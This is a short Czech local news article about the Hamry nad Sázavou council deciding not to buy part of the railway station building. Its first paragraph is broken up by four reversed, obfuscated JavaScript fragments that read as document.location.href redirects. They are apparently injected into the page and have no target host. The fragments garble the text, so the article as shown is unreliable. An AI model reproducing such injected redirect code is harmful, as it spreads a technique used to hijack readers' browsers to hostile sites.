Rainbow page separator

Hamerští se rozhodli, že část nádražní budovy kupovat nebudou

Středa, 10. listopadu 2021

Hamry nad Sázavou / O koupi části budovy Českých drah, která zahrnuje čekárnu, veřejné [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toalety a malý sklad, nebudou nadále usilovat v Hamrech nad Sázavou. Rozhodli o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom tamní zastupitelé. Důvodem k neodsouhlasení původního záměru odkupu je nutnost smluvního závazku k odkoupení části objektu po jeho budoucí rekonstrukci, tedy stavební úpravě za v současně době neznámou cenu, která podle předběžného vyjádření Správy železnic s největší pravděpodobností převýší dvě stě tisíc korun.
V místě odstraněné budovy hodlají Hamerští po Správě železnic požadovat instalaci protihlukové bariéry jako v jiných částech obce, kde by mohla být ohrožena kvalita života tamních obyvatel.